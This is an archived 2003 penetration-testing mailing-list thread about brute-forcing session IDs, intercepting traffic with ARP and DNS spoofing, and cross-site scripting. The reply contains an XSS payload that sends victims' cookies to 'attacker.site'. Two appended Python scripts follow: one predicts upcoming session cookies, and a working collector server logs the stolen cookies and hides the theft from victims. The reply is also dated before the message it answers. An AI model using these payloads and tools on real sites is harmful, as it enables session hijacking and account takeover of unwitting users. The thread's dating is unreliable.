RE: Proof of Concept Tool on Web Application Security

From: Dawes, Rogan (ZA - Johannesburg) (rdawes@deloitte.co.za)
Date: Fri Apr 11 2003 - 03:11:45 EDT


Hi,

As far as brute forcing session ids goes, you could have a look at a post
that I sent to the mobile code mailing list a while back for some
techniques, and some code. That was focused on identifying the patterns in
the cookie sequence, but once you have done that, it should be relatively
easy to identify what the possibilities are for the next cookie, simply by
reversing the algorithm - instead of calculating an integer from a character
string, calculate a character string from the integer.

http://www.pantek.com/library/general/lists/securityfocus.com/webappsec/msg00552.html

Alternatively, take a look at iDefense's cookie and sessionid brute force
tool. Sorry, I forget the name at the moment.

The key to intercepting traffic is to understand the tools that are
available, and put them to use in creative ways.

For example, you could use the arp spoofing or DNS spoofing tools from the
dsniff suite to redirect traffic on your local segment from the proxy to
your own machine. Alternatively, investigate ettercap which could also
possibly do this.

Then run something like WebSleuth, Exodus
(http://mysite.mweb.co.za/residents/rdawes/exodus.html), the dsniff webmitm,
or your favourite proxy program to monitor traffic sent to the proxy, and
alter it as you wish, prior to sending it off to the real proxy, or out via
the router.

Cross-site scripting is mostly useful to compromise the user's session ID, to
save you the effort of brute-forcing it. E.g. if you could get the victim to
execute the following code, you could simply collect their session ID, and
use it yourself.

<script type="text/javascript">document.write("<img src='http://attacker.site/snarf?" + encodeURIComponent(document.cookie) + "'>")</script>

Alternatively, you could make them submit a form containing whatever
information you want, that could possibly elevate your own privileges (if
the victim is an administrator), etc.

Have fun!

Rogan
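The pattern-finding Rogan describes (turn each cookie into an integer, look at the increments between consecutive cookies, then turn integers back into cookie strings to enumerate the candidates for the next one), as an added example that is not code from the original post or from Rogan's earlier mailing-list post. The alphabet (base 36, digits then lowercase) and the sample cookies are constructed for illustration; a real server may use a different alphabet, a different field layout, or mix a counter with random material, and the decoder would have to be adjusted to match.

```python
# Added example (not from the original post): recovering the counter hidden in a
# sequence of session identifiers and enumerating the candidates for the next one.
# The alphabet, cookie format and sample values below are constructed.
import os
import string

ALPHABET = string.digits + string.ascii_lowercase   # assumed: base 36, '0'..'9','a'..'z'

# Constructed sample: four cookies issued in a row by the assumed server.
# Only the last character moves, which is the situation the poster describes.
SAMPLES = ["k7d3px0a1", "k7d3px0a2", "k7d3px0a4", "k7d3px0a7"]


def cookie_to_int(cookie, alphabet=ALPHABET):
    """Interpret the cookie as a big-endian number written in `alphabet`.

    Raises ValueError (from str.index) if the cookie uses a character outside
    the alphabet, which is itself useful: the guessed alphabet is wrong.
    """
    n = 0
    base = len(alphabet)
    for ch in cookie:
        n = n * base + alphabet.index(ch)
    return n


def int_to_cookie(n, width, alphabet=ALPHABET):
    """Reverse of cookie_to_int: write `n` as a `width`-character string, zero-padded."""
    base = len(alphabet)
    out = []
    while n:
        n, r = divmod(n, base)
        out.append(alphabet[r])
    s = "".join(reversed(out))
    return alphabet[0] * (width - len(s)) + s


def changing_suffix_length(samples):
    """How many trailing characters actually vary across the samples; the rest is fixed."""
    return len(samples[0]) - len(os.path.commonprefix(samples))


def analyse(samples, alphabet=ALPHABET):
    """Per-request increments between consecutive sample cookies."""
    values = [cookie_to_int(c, alphabet) for c in samples]
    return [later - earlier for earlier, later in zip(values, values[1:])]


def predict_next(samples, lookahead=None, alphabet=ALPHABET):
    """Candidate values for the cookie issued immediately after the last sample.

    A plain counter gives a constant step and a single candidate.  If other
    users create sessions in between, the step varies; every value up to the
    largest step seen (or `lookahead`) is then enumerated, which is exactly the
    search space a brute-forcer has to cover.
    """
    deltas = analyse(samples, alphabet)
    if not deltas or min(deltas) <= 0:
        raise ValueError("samples are not a monotonically increasing counter in this alphabet")
    last = cookie_to_int(samples[-1], alphabet)
    width = len(samples[-1])
    if lookahead is None:
        lookahead = max(deltas)
    return [int_to_cookie(last + d, width, alphabet) for d in range(1, lookahead + 1)]


if __name__ == "__main__":
    print("characters that vary:", changing_suffix_length(SAMPLES))
    print("increments:", analyse(SAMPLES))
    print("candidates for the next cookie:", predict_next(SAMPLES))
```

With the constructed samples the increments are 1, 2 and 3, so the next cookie is one of three values; against a server that issues a plain counter the list collapses to a single guess. If the increments come out negative or wildly scattered, the cookie is not a counter in the alphabet you guessed, and the decoder rather than the brute-forcer needs more work.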
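The receiving end of the cookie-theft payload above, as an added example that is not part of the original post. The host name attacker.site and the /snarf path come from the payload; the listening port, the logging and the 1x1 GIF response are assumptions. Answering with a real image matters: a broken-image icon is the one thing the victim might notice.

```python
# Added example (not from the original post): collector for the <img src=
# "http://attacker.site/snarf?...document.cookie..."> payload.  It logs the
# victim's cookies and returns a 1x1 GIF so the injected image renders nothing.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlsplit

# 1x1 transparent GIF (assumed response body; any valid image would do).
PIXEL = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
         b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00"
         b"\x00\x02\x02D\x01\x00;")


def cookies_from_path(path):
    """Parse the query string of a /snarf request back into a {name: value} dict.

    The payload appends document.cookie ('a=1; b=2'), so the query arrives
    either raw or percent-encoded depending on the browser and on whether the
    payload used encodeURIComponent; unquote() handles both.
    """
    query = unquote(urlsplit(path).query)
    jar = {}
    for pair in query.split(";"):
        name, sep, value = pair.strip().partition("=")
        if sep:                      # skip empty or malformed fragments
            jar[name] = value
    return jar


class Snarf(BaseHTTPRequestHandler):
    def do_GET(self):
        if urlsplit(self.path).path == "/snarf":
            jar = cookies_from_path(self.path)
            # Goes to stderr; in a real engagement write it to a file instead.
            self.log_message("victim %s cookies %r", self.client_address[0], jar)
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", str(len(PIXEL)))
        self.end_headers()
        self.wfile.write(PIXEL)


if __name__ == "__main__":
    # Assumed: the attacker controls attacker.site and can bind port 80.
    HTTPServer(("0.0.0.0", 80), Snarf).serve_forever()
```

Each cookie name and value is recovered separately, so a site that splits its authentication state across several cookies (the session ID plus a separate user or role cookie) is handled without editing the payload; the harvested values are then simply replayed in a Cookie header from your own browser or proxy.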
-----Original Message-----
From: Indian Tiger [mailto:indiantiger@mailandnews.com]
Sent: 15 April 2003 08:06 PM
To: pen test
Subject: Proof of Concept Tool on Web Application Security

Hi all,

I have tried a lot to find any Proof of Concept Tool on Web Application
Security but still I am not able to find a single one. Let me give some
specific details.

Session ID
Generally the session ID is big enough and acts as an authentication token. Most of
the time it only changes the last few digits, let's say only three digits from
the end. Even though it only does this, it's very tough to guess these last three
digits. I made a testing site and tried but was not able to do that. I
know the session ID is not the only authentication parameter. It can contain
a cookie, session tokens etc. as well. I have tried Achilles, Web Sleuth, Web
Inspect, Spike Proxy etc. I think at least they don't do such brute force.
Is there any tool which does brute force on this and gives the session ID?

Cookie Manipulation
Several articles talk about cookie manipulation. Getting the cookies of
others, even on a LAN, seems very tough or not possible as per my study on the Web.
If an attacker is able to redirect another person's traffic to any proxy like
Achilles or Web Sleuth then he can perform attacks. Now nobody is going to allow
his proxy settings to be changed and his output sent through the attacker (proxy).
Is there any tool which can give access to / manipulate the cookie remotely?

This manipulation can also be achieved if an attacker can put his proxy (Web
Sleuth) on an intermediate router/proxy. One example: I am accessing Hotmail
and on my ISP's router/proxy an attacker installs a tool like Web Sleuth. But
again the question arises: a router works on OSI layer 3, so the attacker can't put a tool
like Web Sleuth there. If the intermediate hop is a proxy, which is at the application level,
there should be some tool which can be placed here.

XSS
Cross-site scripting has to use client-side scripting only. What could be
the maximum impact of this? Can an attacker format a machine or steal data by
this? If yes, how?

Please also tell me of any other proof-of-concept tool on web application
security. I read the OWASP guides, WebGoat and some more to understand these three
things deeply and develop a proof-of-concept tool, but had no success except
hidden-field manipulation. Please recommend some good guides on this.

Any help on this would be highly appreciated.

Thanking You.
Sincerely,

Indian Tiger, CISSP

--------------------------------------------------------------
Costs are climbing and complaints are rising
as SPAM overloads your e-mail servers and Inboxes
SurfControl E-mail Filter puts the brakes on spam & viruses
and gives you the reports to prove it.
http://www.securityfocus.com/SurfControl-pen-test2
Download a free trial and see just
what's going in and out of your organization.
--------------------------------------------------------------




This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:32 EDT